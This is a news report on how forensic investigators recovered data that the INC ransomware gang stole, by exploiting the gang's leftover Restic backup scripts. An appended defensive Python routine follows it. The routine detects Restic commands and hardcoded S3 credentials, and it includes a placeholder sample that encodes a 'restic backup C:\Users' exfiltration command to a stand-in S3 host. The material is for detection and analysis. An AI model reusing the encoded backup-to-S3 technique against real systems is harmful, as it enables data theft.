An operational security failure allowed researchers to recover data that the INC ransomware gang stole from a dozen U.S. organizations.
A deep forensic examination of the artifacts left behind uncovered tooling that had not been used in the investigated attack, but exposed attacker infrastructure that stored data exfiltrated from multiple victims.
The operation was conducted by Cyber Centaurs, a digital forensics and incident response company that disclosed its success last November and now shared the full details with BleepingComputer.
The Cyber Centaurs investigation began after a client U.S. organization detected ransomware encryption activity on a production SQL Server.
The payload, a RainINC ransomware variant, was executed from the PerfLogs directory. Windows normally creates that directory itself, but ransomware actors have increasingly been using it to stage their tooling.
The researchers also noticed artifacts from the legitimate backup tool Restic, even though data exfiltration in this attack had taken place during the lateral-movement stage and the threat actor had not used the utility here.
This caused a shift in the researchers' investigation "from incident response to infrastructure analysis."
The traces that INC ransomware left behind included renamed binaries (like 'winupdate.exe'), PowerShell scripts to execute Restic, hardcoded repository configuration variables, and backup commands.
Restic-related remnants indicated that the threat actor was using the backup tool selectively as part of its operational toolkit.
One of the discovered PowerShell scripts, 'new.ps1', contained Base64-encoded commands for Restic and included hardcoded environment variables used to run the tool (access keys, repository paths, and S3 passwords for encrypted repositories).
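As an added example (not the article's or Cyber Centaurs' code), a small Python triage routine that flags the kind of artifact described above: Restic invocations, including ones hidden inside Base64-encoded PowerShell payloads, and hardcoded Restic/S3 environment variables. The Restic variable names are Restic's documented ones (an assumption, since the article only lists categories), and the sample script is constructed with placeholder values.

```python
import base64
import re

# Restic reads its repository and credentials from these environment variables
# (Restic's documented names, assumed here; the article lists only the categories).
RESTIC_ENV_VARS = {"RESTIC_REPOSITORY", "RESTIC_PASSWORD",
                   "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY"}
RESTIC_CMD = re.compile(r"\brestic(?:\.exe)?\b\s+(?:init|backup|snapshots|restore)", re.I)
ENV_ASSIGN = re.compile(r"\$env:(\w+)\s*=\s*['\"][^'\"]+['\"]", re.I)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_b64(blob):
    """Return the decoded text of a Base64 run, or None if it is not text.
    PowerShell -EncodedCommand payloads are UTF-16LE; plain blobs are UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
        if len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
            text = raw.decode("utf-16-le")
        else:
            text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def triage_script(script):
    """Flag Restic invocations and hardcoded Restic/S3 credentials in a script,
    looking at both the plaintext and every decodable Base64 run inside it."""
    layers = [script] + [t for t in map(decode_b64, B64_RUN.findall(script)) if t]
    commands, hardcoded = [], []
    for layer in layers:
        commands += [m.group(0) for m in RESTIC_CMD.finditer(layer)]
        hardcoded += [v.upper() for v in ENV_ASSIGN.findall(layer)
                      if v.upper() in RESTIC_ENV_VARS]
    return {"restic_commands": commands, "hardcoded_env": hardcoded}


# Constructed sample in the shape the article describes for 'new.ps1':
# hardcoded variables plus an encoded Restic command. All values are placeholders.
_ENCODED = base64.b64encode("restic.exe backup C:\\Users".encode("utf-16-le")).decode()
SAMPLE_PS1 = (
    "$env:RESTIC_REPOSITORY = 's3:s3.example.invalid/placeholder-bucket'\n"
    "$env:RESTIC_PASSWORD = 'PLACEHOLDER-REPO-PASSWORD'\n"
    "$env:AWS_ACCESS_KEY_ID = 'PLACEHOLDER-ACCESS-KEY'\n"
    f"powershell.exe -EncodedCommand {_ENCODED}\n"
)

if __name__ == "__main__":
    print(triage_script(SAMPLE_PS1))
```

Pointing the routine at a directory of recovered .ps1 files gives a quick list of which scripts carry Restic commands and which leak repository credentials, the same artifacts that let the investigators pivot to the attacker's storage.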